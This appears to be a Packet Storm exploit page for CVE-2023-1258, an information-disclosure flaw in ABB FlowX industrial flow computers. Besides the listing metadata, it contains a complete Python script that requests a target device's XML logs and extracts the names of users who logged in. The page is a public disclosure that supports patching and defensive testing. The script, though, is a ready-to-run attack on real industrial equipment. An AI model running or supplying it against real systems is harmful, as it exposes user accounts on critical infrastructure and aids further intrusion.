Lucene search
Paul SmithPACKETSTORM:173610HistoryJul 20, 2023 - 12:00 a.m.
ABB FlowX 4.00 Information Disclosure
2023-07-2000:00:00
Paul Smith
packetstormsecurity.com
152
abb flowx
information disclosure
sensitive information
exploit title
cve-2023-1258
kali linux
xml response
EPSS
0.012
Percentile
85.2%
`# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258
#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests
# Set the request parameter
url = sys.argv[1]
def dump_users():
response = requests.get(url)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
exit()
# Decode the xml response into dictionary and use the data
data = response.text
soup = BS(data, features="xml")
logs = soup.find_all("log")
for log in logs:
test = re.search('User (.*?) logged in',str(log))
if test:
print(test.group(0))
def main():
dump_users()
if __name__ == '__main__':
main()
`
Related
cve
cve
CVE-2023-1258
2023-03-31 08:15:06
cvelist
cvelist
nvd
nvd
CVE-2023-1258
2023-03-31 08:15:06
zdt
zdt
ABB FlowX v4.00 - Exposure of Sensitive Information Exploit
2023-07-19 00:00:00
exploitdb
exploitdb
ABB FlowX v4.00 - Exposure of Sensitive Information
2023-07-19 00:00:00
prion
prion
Code injection
2023-03-31 08:15:00